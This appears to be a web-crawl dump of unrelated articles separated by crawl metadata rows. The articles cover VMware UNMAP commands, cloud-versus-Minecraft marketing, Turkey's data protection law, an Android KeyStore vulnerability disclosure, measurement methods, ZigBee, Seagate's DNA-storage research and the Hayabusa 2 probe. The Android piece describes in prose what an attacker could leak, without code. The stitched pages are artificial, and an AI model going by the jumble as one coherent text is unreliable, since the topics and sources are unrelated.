Therefore, we would be able to create any size temp files and only issue UNMAP to the blocks allocated to that file and yet be sure that we can issue UNMAP on all the free blocks in the volume.
The user options have changed accordingly. The user now only specifies the size of the temp file to be created. Using any specified size we can issue UNMAPs on all the free blocks in a volume.
We are integrating this operation within the esxcli command framework. The vmkfstools –y option is deprecated for external use.
We have also enhanced the UNMAP command implementation to support multiple block descriptors (in ESX 5.1 we only issued one block descriptor per UNMAP command). We now issue up to 100 block descriptors depending on the storage target capabilities specified in the Block Limits VPD (B0) page.
ESXCLI has a new command “unmap” under “excli storage vmfs” namespace which users can use to Unmap the free blocks from the VMFS volume givin UUID/LABEL.
esxcli storage vmfs unmap <–volume-label=<str>|–volume-uuid=<str>> [–reclaimunit=<long>]
-n|–reclaim-unit=<long>: Number of VMFS blocks that should be unmapped per iteration.
-l|–volume-label=<str> : The label of the VMFS volume to unmap the free blocks.
-u|–volume-uuid=<str> : The uuid of the VMFS volume to unmap the free blocks.
Sample uses are:
# esxcli storage vmfs unmap –volume-label datastore1 –reclaim-unit 100
# esxcli storage vmfs unmap -l datastore1 -n 100
# esxcli storage vmfs unmap –volume-uuid 515615fb-1e65c01d-b40f 001d096dbf97 –reclaim-unit 500
# esxcli storage vmfs unmap -u 515615fb-1e65c01d-b40f-001d096dbf97 -n 500
# esxcli storage vmfs unmap -l datastore1
# esxcli storage vmfs unmap -u 515615fb-1e65c01d-b40f-001d096dbf97
Frequently Asked Questions
Will this implementation still issue UNMAP to non-‐mapped LBA?
This implementation will still issue UNMAP to all blocks that are considered by the vmfs volume to be "free". That includes any blocks that were never written to and hence would be non-‐mapped at the storage back-‐end.
What happens to the current recommendation of running UNMAP in the maintenance window.
With ESXi 5.5, we will be recommending customers to use UNMAP in normal mode of ESXi operation. There is no restriction to limit performance under maintenance window. | <urn:uuid:c96d3e99-7ecc-4c24-ae77-e03b59870dd5> | CC-MAIN-2022-40 | https://volumes.blog/2013/06/21/vsphere-5-5-where-is-my-space-reclaim-command/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00315.warc.gz | en | 0.902676 | 1,343 | 2.859375 | 3 |
Recently I was reading this article in the New York Times about Minecraft. It’s a story about how Minecraft is changing the way children play, learn and create things. It does so by bringing them into a digital environment that provides the freedom to let them fully design their own world, complete with houses, vehicles and more. Players start mining and expand their environment by chopping trees, mining blocks and creating their own tools. In Minecraft, the article goes, you’re provided with a toolbox to do so, which allows you to be creative and build things. The physical equivalent of Minecraft is somewhat like Lego.
Fortunately, in the Minecraft world, things look simple but can get pretty advanced as well. By using a resource called ‘redstone’, players can build their own machines to make life easier, automating things that are time-consuming or boring. The components used to do this are very similar to the components that are used to design computers – logic gates and digital signals. What’s more, just like Lego, you have to buy the blocks beforehand and people will complain if you need a newer set because the old one doesn’t have the blocks that you need.
Pickaxes and Chef
As someone working in technology during the day but who loves to play Minecraft in my free time, I couldn’t help seeing a parallel with IT infrastructure. On a daily basis, we are providing building blocks and seemingly simple tools that allow customers to build their own solutions as well as to automate things that are time-consuming or boring. What if the cloud is our Minecraft?
In the cloud, the focus is on flexibility and automation. We provide you with an environment as well as a number of (basic and more advanced) tools to create whatever you like. You’re not using pickaxes or furnaces but, rather, Ansible or Chef. Sometimes – like in the Minecraft world – our customers come up with ways to use our infrastructure we didn’t even think about yet. Seemingly simple building blocks can be used to design very complex things. After all, at the end of the day the device you’re reading this on is just made of logic gates and digital signals.
In Minecraft, the player doesn’t deal with physical things. (S)he doesn’t have to manipulate items or click things together – the way we used to play with Lego or other construction toys. Lego solved this issue smartly by designing Minecraft Lego sets. So whenever it makes sense, we can choose to go for the hardware. Because it fits better, or you don’t need the flexibility, or just because it’s easier to ask for a box of Legos. This is not too different from IaaS: whenever you don’t need that flexibility in your cloud infrastructure, you can go for bare metal or more traditional dedicated servers.
It’s not just a game
There are some situations where that parallel goes off track. I can’t combine the things I built in my Minecraft world with the physical Lego set. It’s not yet possible to create a single build that connects those worlds. In IaaS, this is different. Customers can select bare metal, cloud and other infrastructure components, combining them whenever it makes sense to do so. And in infrastructure it often does. The challenge is for the supplier to provide those simple tools that allow this to be done easily. Another huge difference is that your business might be dependent on your cloud whereas what you do in your Minecraft world has little real-world business impact. Carelessly mining blocks in a game can be fun but business-critical infrastructure needs to be well thought-out and carefully designed.
One last important difference is finding your way. In Minecraft, you’re dropped into this new world and part of the game is exploring and figuring out how to survive. In IT infrastructure, there’s more guidance and help available. This is where Leaseweb comes in. Talk to us, and we’ll help you figure
out what combination of Lego or Minecraft – or both – you need, all around the (real) world. We’ll even help you build it, unless you want to connect those blocks together yourself! | <urn:uuid:805bd2e4-77e4-484e-8a8e-2a9a2d77a80c> | CC-MAIN-2022-40 | https://blog.leaseweb.com/2016/05/17/cloud-like-minecraft/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00315.warc.gz | en | 0.947503 | 883 | 2.5625 | 3 |
Turkey’s Law on Protection of Personal Data No. 6698
Turkey’s Law on Protection of Personal Data No. 6698, also known as the Data Protection Law for short, is a comprehensive data protection law that was passed in Turkey in 2016. Prior to the passing of the Data Protection Law, Turkey had yet to adopt any legislation related to the protection of data privacy rights. As such, Turkey sought to provide the citizens of their country with data protection rights on the same level as those offered by the EU’s General Data Protection Regulation or GDPR. To this end, the Data Protection Law outlines the various restrictions and responsibilities that data controllers must abide by when processing the personal data of Turkish citizens.
What is the scope and applicability of the Data Protection Law?
Unlike the General Data Protection Regulation, Turkey’s Data Protection Law does not contain any specific territorial scope. Alternatively, the Data Protection Law applies to:
- Natural persons whose personal data is proceeded
- Natural or legal persons who process such data fully or partially through automatic or non-automatic means only for the process which is part of any data registry system set out in the Law.
In terms of the material scope of the law, the Data Protection Law defines personal data to mean “as an operation that is carried out on personal data such as collection, recording, storage, retention, alteration, re-organization, disclosure, transferring, taking over, making retrievable, classification, or preventing the use thereof, fully or partially through automatic or non-automatic means only for the process which is a part of any data registry system”. As such, any structured system that is used to facilitate the access to the personal data of Turkish citizens according to a specific criterion will fall under the scope of the Data Protection Law.
What are the requirements of Data controllers under the Data Protection Law?
As is the case with many other privacy laws around the world, the Data Protection Law establishes various data protection principles that data controllers must adhere to when processing the personal data of data subjects. These principles include:
- Personal data must be processed both lawfully and fairly.
- Personal data must be accurate and where necessary, kept up to date.
- Personal data must be processed for specific, explicit, and legitimate purposes.
- Personal data must be relevant, limited, and proportionate to the purposes for which they are processed.
- Personal data may only be retained for the period of time that is determined by the law, or for the period deemed necessary for the intended purposes of data processing.
- Data controllers are obliged to prevent both the unlawful processing and access of personal data, and ensure the retention of personal data.
- Data controllers are obliged to carry out necessary audits to ensure that they maintain compliance with the law.
- Data controllers are required to comply with data transfer conditions for data transfers within the country, as well as cross-border data transfers.
- Data controllers are also responsible for creating a data inventory for all personal data processed within Turkey. This data inventory must include identifying information, data categories, the intended purpose of data processing, data subject groups, recipient or recipient groups to which personal data may be transferred, information concerning whether the relevant data category is transferred abroad, data security measures that are to be undertaken by associated data controllers, and the maximum period of time for which personal data will be processed.
What are the rights of data subjects under the Data Protection Law?
Under the Data Protection Law, data subjects are granted a variety of rights in accordance with the law. These rights include the following:
- The right for a data subject to request information concerning whether their personal has been or is being processed.
- The right to request information related to how their data was processed, if a data subject’s personal data has been processed.
- The right to request information related to the intended purpose for data processing, as well as whether a data subject’s data has been used in a manner that is consistent with this intended purpose.
- The right to request information regarding the identities of natural or legal persons with whom a data subject personal data may have been shared with.
- The right to request that a data controller correct, erase, or remove personal data pertaining to a data subject.
- The right to request information confirming whether or not a data subject’s data is transferred, as well as the right to request information relating to whether or not the associated data controller has advised any third parties to which this data has been transferred concerning the correction, erasure, and removal of said data, if such changes are requested by the data subject.
- The right to object to any negative consequence that may result from a data subject’s data being analyzed exclusively through the use of automated systems.
- The rights to access, rectification, erasure, and to be informed.
- The right to seek compensation in the event that any of the rights stated above are violated.
In terms of sanctions and penalties for non-compliance, data controllers who are found to be in violation are subject to a variety of punishments. These punishments include a prison sentence of six months to four years and administrative fines ranging from TRY 5,000 ($575) to TRY 1 million ($115,190), as well as the right for data subjects to claim compensation for the unlawful collections or processing of their personal data. What’s more, there are also sector-specific fines that can be levied against businesses and organizations who violate the law, which can include up to 3% of an agency’s calendar year’s net sales.
As Turkey was one of the many countries around the world that had yet to pass comprehensive data privacy legislation prior to the passing of the Data Protection Law in 2016, the law serves as a resource for the protection of the data privacy rights of Turkish citizens. As the goal was to provide Turkish citizens with the same level of data protection as is offered by the EU’s General Data Protection Regulation, Turkey’s Data Protection law provides steep punishments for data controllers who are found to be in non-compliance. To this end, the data protection rights of Turkish citizens can be protected at all costs. | <urn:uuid:2e47e211-565d-4d1f-9c30-ba4832d771d7> | CC-MAIN-2022-40 | https://caseguard.com/articles/turkey-law-on-protection-of-personal-data-no-6698/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00315.warc.gz | en | 0.927045 | 1,273 | 2.59375 | 3 |
Security researchers at IBM have gone public about a critical security vulnerability in the Android operating system, that could allow hackers to remotely execute code on users’ devices and steal sensitive information.
The flaw, which was discovered nine months ago by researchers of the Application Security team at IBM but has only now been made public, affects everyone who is not running the most up-to-date version of Android – version 4.4, known as KitKat.
Roee Hay, who leads the application security research team at IBM, said that the reason why it has taken so long for details of the security hole to be made public is that his group believes in responsible disclosure, and has worked with the Android security team at Google to ensure that a patch was made available for KitKat.
Normally security researchers who discover vulnerabilities are chomping at the bit to announce their discovery, and it wouldn’t have been a surprise to see this one announced at the same time as the fix was rolled out by Google.
But things are very different when it comes to Android, because of the difficulties that exist in rolling out patches to users of the many different devices running the operating system – a point that Hay acknowledged in his article:
“Considering Android’s fragmented nature and the fact that this was a code-execution vulnerability, we decided to wait a bit with the public disclosure.”
There is good reason to be concerned.
Even though the latest version of Android is protected against the vulnerability – there are still many Android users who are running older versions of the operating system and are potentially at risk.
The latest statistics from Google show that KitKat is only being used by 13.6% of Android users.
What IBM’s researchers have discovered is a Stack Buffer Overflow vulnerability in the Android KeyStore service – which is responsible for storing and securing device’s cryptographic keys.
If successfully exploited, the vulnerability could allow malicious code to execute which could:
- Leak the device’s lock credentials. Since the master key is derived by the lock credentials, whenever the device is unlocked, ‘Android::KeyStoreProxy::password’ is called with the credentials.
- Leak decrypted master keys, data and hardware-backed key identifiers from the memory.
- Leak encrypted master keys, data and hardware-backed key identifiers from the disk for an offline attack.
- Interact with the hardware-backed storage and perform crypto operations (e.g., arbitrary data signing) on behalf of the user.
The only silver lining is that IBM’s researchers say that they have seen no evidence to date that the vulnerability has been exploited in the wild,
As Optimal Security reported last week, Google is currently rolling out the latest version of KitKat (4.4.4) to its own Nexus smartphones and tablets, in order to protect against another serious vulnerability in OpenSSL, and Android Lollipop (if that’s what the next big version gets called) will hopefully be available later this year.
But however good Google makes the future incarnations of its mobile operating system, there will still be a lot of users of older flavors of Android left running insecure versions with no clear path for updating and patching their phones and tablets. I, for one, wouldn’t be surprised to see those older Android devices increasingly targeted by hackers.
This article originally appeared on the Lumension blog.
Found this article interesting? Follow Graham Cluley on Twitter to read more of the exclusive content we post. | <urn:uuid:cdf44134-411a-409d-8a23-990a56401f41> | CC-MAIN-2022-40 | https://grahamcluley.com/running-android-kitkat-hackers-steal-info-phone/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00315.warc.gz | en | 0.954906 | 727 | 2.765625 | 3 |
If you want to make better decisions, using data to inform your decision-making is the way to go. Organizations largely understand this reality in principle, if not always in practice. But it’s not enough to just gather data; you have to know how to use it, and unfortunately, most organizations don’t.
Fortunately, quantitative analysis doesn’t have to be that difficult. We’ve found over the decades that much of what interferes with data-driven decision-making is confusion, misunderstanding, and misconceptions about measurement in general. As our work with leading public and private entities across the globe has proven, these obstacles can be overcome. Anything can be measured, and if you can measure it, you can improve your decisions.
Below are seven simple principles for making better measurements that form the basis of our methodology, Applied Information Economics (AIE), and – if applied – can quickly improve the quality of the decisions you make (Figure 1).
7 Simple Rules for Measuring Anything – Hubbard Decision Research
Rule 1: If It Matters, It Can Be Measured
Nothing is impossible to measure. We’ve measured concepts that people thought were immeasurable, like customer/employee satisfaction, brand value and customer experience, reputation risk from a data breach, the chances and impact of a famine, and even how a director or actor impacts the box office performance of a movie. If you think something is immeasurable, it’s because you’re thinking about it the wrong way.
- If it matters, it can be observed or detected.
- If it can be detected, then we can detect it as an amount or in a range of possible amounts.
- If it can be detected as a range of possible amounts, we can measure it.
If you can measure it, you can then tell yourself something you didn’t know before. Case in point: the Office of Naval Research and the United States Marine Corps wanted to forecast how much fuel would be needed in the field. There was a lot of uncertainty about how much would needed, though, especially considering fuel stores had to be planned 60 days in advance. The method they used to create these forecasts was based on previous experience, educated assumptions, and the reality that if they were short on fuel, lives could be lost. So, they had the habit of sending far more fuel to the front than they needed, which meant more fuel depots, more convoys, and more Marines in harm’s way.
After we conducted the first round of measurements, we found something that surprised the Marines: the biggest single factor in forecasting fuel use was if the roads the convoys took were paved or gravel (figure 1).
We also found that the Marines were measuring variables that provided a lot less value. More on that later.
Rule 2: You Have More Data Than You Think
Many people fall victim to the belief that to make better decisions, you need more data – and if you don’t have enough data, then you can’t and shouldn’t measure something.
But you actually have more data than you think. Whatever you’re measuring has probably been measured before. And, you have historical data that can be useful, even if you think it’s not enough.
It’s all about asking the right questions, questions like;
- What can email traffic tell us about teamwork?
- What can website behavior tell us about engagement?
- What can publicly available data about other companies tell us about our own?
Rule 3: You Need Less Data Than You Think
Despite what the Big Data era may have led you to believe, you don’t need troves and troves of data to reduce uncertainty and improve your decision. Even small amounts of data can be useful. Remember, if you know almost nothing, almost anything will tell you something.
Rule 4: We Measure to Reduce Uncertainty
One major obstacle to better quantitative analysis is a profound misconception of measurement. For that, we can blame science, or at least how science is portrayed to the public at large. To most people, measurement should result in an exact value, like the precise amount of liquid in a beaker, or a specific number of this, that, or the other.
In reality, though, measurements don’t have to be that precise to be useful. The key purpose of measurement is to reduce uncertainty. Even marginal reductions in uncertainty can be incredibly valuable.
Rule 5: What You Measure Most May Matter Least
What if you already make measurements? Let’s say you collect data and have some system – even an empirical, statistics-based quantitative method – to make measurements. Your effectiveness may be severely hampered by measuring things that, at the end of the day, don’t really matter.
By “don’t really matter,” we mean that the value of these measurements – the insight they give you – is low because the variable isn’t very important or isn’t worth the time and effort it took to measure it.
What we’ve found is a bit unsettling to data scientists: some of the things organizations currently measure are largely irrelevant or outright useless – and can even be misleading. This principle represents a phenomenon called “measurement inversion” (Figure 2):
Unfortunately, it’s a very common phenomenon. The Marine Corps fell victim to it with their fuel forecasts. They thought one of the main predictors of fuel use for combat vehicles like tanks and Light Armored Vehicles (LAV) was the chance that they would make contact with the enemy. This makes sense; tanks burn more fuel in combat because they move around a lot more, and their gas mileage is terrible. In reality, though, that variable didn’t move the needle that much.
In fact, the more valuable predictive factor was whether or not the combat vehicle had been in a specific area before. It turns out that vehicle commanders, when maneuvering in an uncertain area (i.e. landmarks, routes, and conditions in that area they had never encountered before), tend to keep their engines running for a variety of reasons. That burns fuel.
(We also discovered that combat vehicle fuel consumption wasn’t as much of a factor as convoy vehicles, like fuel trucks, because there were less than 60 tanks in the unit we analyzed. There were over 2,300 non-combat vehicles.)
Rule 6: What You Measure Least May Matter Most
Much of the value we’ve generated for our clients has come through measuring variables that the client thought were either irrelevant or too difficult to measure. But often, these variables provide far more value than anyone thought!
Fortunately, you can learn how to measure what matters the most. The chart below demonstrates some of the experiences we’ve had with combating this phenomenon with our clients (Figure 3):
This isn’t to say that the variables you’re measuring now are “bad.” What we’re saying is that uncertainty about how “good” or “bad” a variable is (i.e. how much value they have for the predictive power of the model) is one of the biggest sources of error in a model. In other words, if you don’t know how valuable a variable is, you may be making a measurement you shouldn’t – or may be missing out on making a measurement you should.
Rule 7: You Don’t Have to Beat the Bear
When making measurements, the best thing to remember is this: If you and your friends are camping, and suddenly a bear attacks and starts chasing you, you don’t have to outrun the bear – you only have to outrun the slowest person.
In other words, the quantitative method you use to make measurements and decisions only has to beat the alternative. Any empirical method you incorporate into your process can improve it if it provides more practical and accurate insight than what you were doing before.
The bottom line is simple: Measurement is a process, not an outcome. It doesn’t have to be perfect, just better than what you use now. Perfection, after all, is the perfect enemy of progress.
Incorporate these seven principles into your decision-making process and you’re already on your way to better outcomes.
Learn how to start measuring variables the right way – and create better outcomes – with our two-hour Introduction to Applied Information Economics: The Need for Better Measurements webinar. $100 – limited seating. | <urn:uuid:fa9a6e0b-ae34-4011-9c49-35e8915a54c7> | CC-MAIN-2022-40 | https://hubbardresearch.com/7-simple-principles-for-measuring-anything/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00315.warc.gz | en | 0.950495 | 1,791 | 2.515625 | 3 |
The familiarized name for the IEEE 802.15.4 standard, ZigBee is an open global specification applying to high-level communication protocols for wireless personal area networks (WPANs), home area networks (HANs) and machine-to-machine (M2M) networks using small, low-power radios. Overseen by the ZigBee Alliance and first introduced by Philips Semiconductors, the protocol first saw light of day in 1998. Standardization followed in 2004 with subsequent revisions in 2006 and 2007. Aside — for the non-apiologists among us, a “zigbee” is a portmanteau describing a bee’s “waggle dance,” used to communicate to hivemates the direction where they must fly to find a food source.
ZigBee ABCs and XYZs
ZigBee can transmit from one network device to another over a line-of-sight distance of approximately 70 meters (230 feet); greater distances can be realized by “daisy-chaining” or mesh networking one node to the next. The protocol even features low latency despite the fact ZigBee consumes less power (which limits transmission distance) than Bluetooth and optimized for long battery life measured in months and years. ZigBee operates on non-licensed radio bands of 2.4 GHz worldwide, 915 MHz in the U.S. and Australia, 868 MHz in Europe and 784 MHz in China.
ZigBee utilizes packets with a maximum size of 128 bytes (maximum payload is 104 bytes) transported bidirectionally. This is a low data rate, true, but the applications best suited for the ZigBee standard typically do not require high data rates. IEEE 802.15.4 supports both 64 bit IEEE addresses and 16 bit short addresses. Every device in the ZigBee network is uniquely identified with a 64 bit address, just as they have a unique IP address, and once provisioned the short addresses can then enable the network to support up to 65,000+ nodes or slaves. These nodes can be managed by a single remote control. Superframe time synchronization is an option which can incorporate a guaranteed time slot mechanism for high priority messages.
Common applications include data networking and home/building/industrial automation, e.g., starting the home Blu-ray disc player or TIVO, extinguishing/dimming office lights, engaging a warehouse’s security system, utility metering, etc., all at the touch of a button. Users merely use the Internet for dial-in access. Designed for use in low data rate applications (defined at a range of 20 Kbps to 250 Kbps) where long battery life is needed, ZigBee is best suited for intermittent data transmissions from an input device or sensor. Among the protocol’s very attractive attributes is its capability to operate efficiently in areas with a high degree of radio frequency congestion and interference.
ZigBee standards and releases include the following:
- ZigBee 2004 — the original standard, defined as ZigBee 1.0 and publicly released in June 2005.
- ZigBee 2006 — this subsequent version, released in September 2006, introduced the concept of a cluster library.
- ZigBee 2007 — Publicly released in October 2008, it contains two different profile classes.
- ZigBee PRO — One of the profile classes of ZigBee 2007, it provides additional features for robust deployments including enhanced security.
- RF4CE — denoting ‘Radio Frequency for Consumer Electronics,’ this standard applies to audio visual uses. Adopted by the ZigBee Alliance, Version 1.0 was released in 2009.
Here’s a basic video overview of ZigBee from Russian technical consultant Anton “Chip and Dip” Pankratov:
Comparing ZigBee with Other WPAN Protocols
No doubt the reader is aware that there are a number of WPAN and M2M protocols currently in use. Each has distinct advantages and disadvantages; all are in widespread use.
The Infrared Data Association (IrDA) is the international body responsible for governing standards for interoperable, low-cost data infrared (IR) wireless connections. Providing bidirectional line-of-sight high speed connections at short range for point-to-point wireless data transfers, IR wireless “point and shoot” devices are in widespread use across the world. Most people have at least one in their home and/or office. These include peripherals such as TV remotes, wireless computer “mouses” (your intrepid author revels in this usage; “mice” or “mouse devices” is also acceptable), printers, modems and headsets.
As popular as IR is, these devices suffer from limitations. Line-of-sight requirements, as mentioned, is one and the devices must generally be no more than two meters apart. Too, IR waves cannot pass through walls like Wi-Fi can. On the other hand, IR is much more secure, comparable to that of hard-wired systems, and has a very low bit error rate (BER). IR ports cost very little to incorporate into a device. Reportedly, Data transmission rates max out at 4 Mbps, much higher than that available with ZigBee.
ZigBee ‘Remote Control’ (i.e., RF4CE) is designed to replace venerable IrDA standards. Its advantages include bidirectional high speed communication ability, faster response times, increased energy efficiency and no line-of-sight restrictions. RF4CE can be found on many consumer electronic devices including HD and UHD TVs, home theater gear and audio equipment. Manufacturers incorporating RF4CE are Samsung, Philips, Sony, Panasonic and many others.
The latest version of ZigBee Remote Control (RF4CE 2.0), released in 2014, is backward-compatible with the previous version.
Without a doubt Bluetooth Low Energy (BLE) is ZigBee’s most serious rival for WPAN dominance. Like ZigBee, BLE does not require line-of-sight between devices and can transmit through walls and around barriers. Notably, BLE can transmit data over greater distances than ZigBee, up to 100 meters (328 feet) with amplification. ZigBee is limited to a range of 70 meters (230 feet). While both operate on the same frequency band, Bluetooth splits and exchanges data packets across a 1 MHz bandwidth channel — 79 are available — using a modulation technique known as Frequency Hopping Spread Spectrum (FHSS). ZigBee does not split packets, using Direct Sequence Spread Spectrum (DSSS) instead
According to Link Labs, “these Personal Area Network (PAN) wireless standards have more differences than similarities.”A summary of other differences is presented below:
|Protocol Stack Size||250K bytes||28K bytes|
|Battery||Meant for frequent recharging||Not rechargeable|
|Maximum Network Speed||1 Mbps||250 Kbps|
|Network Range||up to 100 meters (328 feet)||70 meters (230 feet)|
|Typical Network Join Time||3 seconds||30 milliseconds|
Another WPAN standard in use but not nearly as widely heralded, this proprietary (not open source) technology has key similarities and differences from ZigBee. Both are mesh networks, both use the IEEE 802.15.4 protocol and both have similar applications in security systems, home automation, environmental controls, etc.
Where they differ is
- ZigBee utilizes the 2.4 GHz frequency band, meaning it can be used worldwide. This band is notorious for interference and congestion as it is shared with Wi-Fi and Bluetooth. Z-Wave connects on sub-GHz bands — 915 MHz in the U.S. and 868 MHz in Europe.
- As mentioned earlier, ZigBee uses DSSS. Z-Wave uses Frequency Shift Keyed (FSK) modulation. For more info on FSK, see here.
- Z-Wave range is reported to be limited to 30 meters (98.5 feet); ZigBee tops out at 70 meters.
While the ZigBee Alliance claims “reliable” and “seamless” interoperability, competitors and industry observers beg to differ. For example, electronic engineer and blogger Dr. Walter Colitti writes that “the lack of interoperability in ZigBee is due to two main reasons: the lack of an open protocol stack and the lack of a proper certification program.” Link Labs, proprietor of a competing product called Symphony Link, notes that “two ZigBee profiles can interfere with one another.” A separate blog entry adds, “ZigBee’s prime drawback is its inability to communicate easily with other IP protocols.”
But the lack of a dominant standard for WPANs, HANs, etc., is not the foremost concern at the moment facing equipment manufacturers. As key elements of the Internet of Things (IoT), smart appliances must first be secured against hackers and botnets. Otherwise, the world will see repeats of the widely reported distributed denial of service (DDoS) attacks against dynamic DNS provider Dyn on 21 October 2016. | <urn:uuid:be74e0c1-e6ec-461f-8409-284f0b2c22c0> | CC-MAIN-2022-40 | https://internet-access-guide.com/zigbee-cute-name-serious-standard/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00315.warc.gz | en | 0.904065 | 1,922 | 3.171875 | 3 |
Seagate is bringing its lab-on-a-chip technology to Catalog’s DNA storage technology to enable faster and much, much smaller devices to read data stored in DNA. What is a lab-on-a-chip, and why is Seagate involved with this concept?
A laboratory on a chip is a device for carrying out chemical reactions, using minute amounts of fluids, and registering the results. Lab-on-a-chip devices have been developed by researchers developing cost-effective and rapid diagnostic testing of patients. These chips include all the steps from sample-in to result-out, at the point of care, such as the doctor’s office or patient home, rather than in a hospital’s diagnostic laboratory. They can detect protein markers so as to diagnose cardiac diseases and nucleic acid markers to look for infectious diseases. The COVID rapid lateral flow test kit can be seen as a very simple lab test on a chip size device, being a single use, single function unit for checking the presence of the COVID virus antigen in a sample of fluid.
Chip-based labs are functionally specific and can use micro-fluidic technology to move droplets through the device as a way of pre-treating a sample before it is tested. The pre-treatment may purify or amplify biomarkers whose presence is being tested.
Catalog’s current Shannon technology has demonstrated writing and reading data using DNA storage technology but the equipment needs to be housed in a room, which Catalog says is the size of a small kitchen. Seagate says the results of its joint research with Catalog are expected to reduce Shannon’s size by a factor of 1,000 and also increase the automation and scalability of Catalog’s platform.
It is not obvious why Seagate is involved in this technology. Its primary focus is manufacturing hard disk drives – nothing to do with making or using chemical laboratories on a chip. It has been involved in fluidics through the use of fluid bearings for disk drive motors. A viscous oil is used instead of metal ball bearings to support the drive shaft. Fluid dynamic bearing motors have no metal-to-metal contact and are quieter than metal bearings, withstand more shock forces and have a theoretical infinite life.
But this use of a particular viscous fluid is a long way away from DNA-based lab-on-a-chip work.
A Catalog blog talks about desktop and IoT-size devices and states: “The collaboration will center on using Seagate’s ‘lab on a chip’ technology to reduce the volume of chemistry required for DNA-based storage and computation. Using the Seagate platform, tiny droplets of synthetic DNA can test chemistry at significantly smaller levels. These droplets will be processed through dozens of reservoirs on the Seagate platform. DNA from individual reservoirs is mixed to produce chemical reactions for a range of computing functions, including search and analytics, machine learning, and process optimization.”
This appears to be focussed on computation more than storage and is not a near-term research effort.
Hyunjun Park, founding Catalog CEO, said in a canned quote: “This work with Seagate is essential to eventually lowering costs and reducing the complexity of storage systems.”
Seagate DNA storage background
In December 2021, nine months ago, Seagate wanted to recruit a research engineer for lab-on-a-chip work. The job spec requirements document said “This position offers a variety of opportunities to prototype, experiment and benchmark new ideas and concepts in lab-on-a-chip domain.”
“The engineer will be involved in exciting projects in lab-on-a-chip involving designing experiments to proofs-of-concept. The successful candidate will also work with the global team of Seagate researchers in designing and fabricating microfluidic devices, evaluating systems, as well as analyzing and documenting the results for internal as well external reports and presentations.”
Candidates should have “Theoretical and practical knowledge of DNA amplification techniques (PCR, LAMP, rolling circle amplification, etc.). ”
It is obvious that Seagate Research was looking at DNA storage then. In fact it has been looking into DNA storage for some time before that.
Seagate patents for DNA storage and microfluidics
Seagate has been involved in research engineering into DNA storage and microfluidics for two and a half years and has been involved in four patents that we know of. For example, Ed Gage, Seagate VP For Research, is a contributor to a patent applications involving microfluidics:
- Microwave Heating Device for Lab On A Chip – Publication number: 20220048032
- Filed: August 9, 2021
- Publication date: February 17, 2022
- Inventors: Tim Rausch, Edward Charles Gage, Walter R. Eppler, Gemma Mendonsa.
Tim Rausch, now at AWS, was at Seagate between May 2003 and November 2020. Edward Charles Gage is Seagate VP for research. Walter Eppler is a technologist at Seagate Technology. Gemma Mendonsa is a biomedical engineer at Seagate.
Eppler and Mendonsa filed a patent for Methods and Systems for Reading DNA Storage Genes in August 2020.
Rausch, Eppler and Mendonsa filed a patent for Microfluidic Lab-on-a-Chip for Gene Synthesis in April 2020. The abstract states: “A microfluidic lab-on-a-chip system for DNA gene assembly that utilizes a DNA symbol library and a DNA linker library. The lab-on-a-chip has a fluidic platform with a plurality of arrays operably connected to a voltage source and a controller for the voltage source …”
Text in this application reads: “DNA is an emerging technology for data storage. Current methods assert that a DNA strand or gene, to store 5KB of data, can be written in 14 days. Comparatively, magnetic disk drives and magnetic tapes both can write 1 TByte in about an hour. A single DNA base pair location can store 2 bits; thus, 4000 Giga-base pairs would need to be stored in an hour to match the capabilities of a single disk drive or tape. Although current technology is believed to be capable of writing 15 base pairs an hour, there needs to be an 8 to 9 order of magnitude improvement in order for DNA data storage to be viable.” The application includes a “method of synthesizing a DNA gene on a lab-on-a-chip” which can speed up DNA storage writing.
The three researchers filed a second application in this area in the same month: Methods of Gene Assembly and their use in DNA Data Storage.
We have asked Seagate for a briefing to explain how and why it became involved in DNA data storage.
Our investigations tuned up Gareth McClean, a process engineer – electroplating at Seagate Technology in Derry, Northern Ireland, whose listed specialities in fluorescence-based immunoassay detection systems, focussing on the point of care market in the field of medical diagnostics, and also microfluidic-based diagnostic devices for the point of care market. This is possibly a coincidence.
In December 2021 Chinese DNA storage researchers announced they had developed a SlipChip – a microfluidic device to hold the DNA chemicals and the various reagents. A single SlipChip can be an electrode and its electrical charge altered by the presence or absence of DNA sequences.
The SlipChip can be classified, we think, as a lab-on-a-chip. | <urn:uuid:d6ea9bba-5ea5-41c7-a3ee-34cf9fba68ab> | CC-MAIN-2022-40 | https://blocksandfiles.com/2022/09/19/seagate-dna-storage-involvement/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00315.warc.gz | en | 0.94181 | 1,597 | 3.421875 | 3 |
TOKYO (Reuters) – A Japanese space probe named after a falcon arrived at an asteroid 300 million kilometers from Earth on Wednesday after a three-and-a half year journey on a mission to seek the origins of life.
The Hayabusa 2 blasted off in December 2014 for the asteroid Ryugu on a pioneering mission to take samples that scientists hope will help reveal how life began. Its round-trip mission is set to take six years.
“Everything has gone as planned,” a spokesman for the Japan Aerospace Exploration Agency (JAXA) told a news conference. “The probe has arrived at the asteroid”.
Hayabusa 2, named for the peregrine falcon, will spend the next few months orbiting about 20 km above the asteroid and mapping its surface before landing. It will then use small explosives to blast a crater on the surface and collect the resulting debris.
Asteroids are believed to have formed at the dawn of the solar system and scientists say Ryugu may contain organic matter that may have contributed to life on Earth.
Television footage showed the control room erupting in applause as the probe’s safe arrival was confirmed, with some researchers standing and grinning as they shook hands.
“We’re mostly relieved, but now there’s tension as to whether the main mission will go well,” one official said.
Should all go according to plan, Hayabusa 2 is expected to spend around 18 months near the asteroid and return to Earth with samples at the end of 2020, the year Tokyo hosts the Summer Olympic Games.
The first Hayabusa probe was unable to collect as much material as hoped but still made history by being the first probe to bring back samples from a different asteroid.
